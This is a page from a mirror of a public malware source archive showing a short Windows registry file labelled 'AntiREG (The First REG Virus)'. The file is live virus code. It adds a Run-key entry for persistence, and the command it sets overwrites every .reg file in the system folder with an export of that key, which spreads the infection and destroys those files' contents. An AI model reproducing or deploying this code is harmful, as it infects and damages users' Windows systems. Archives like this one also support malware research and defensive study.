13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 03:58:34 +00:00
vxug-MalwareSourceCode/Win32/Virus.WinREG.Antireg.b
2020-10-10 22:07:43 -05:00

14 lines
485 B
Brainfuck

REGEDIT4
;;-------------------------------;;
;; ;;
;; AntiREG (The First REG Virus) ;;
;; Coded By Lys Kovick ;;
;; Special Thanks To Phage ;;
;; ;;
;;-------------------------------;;
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"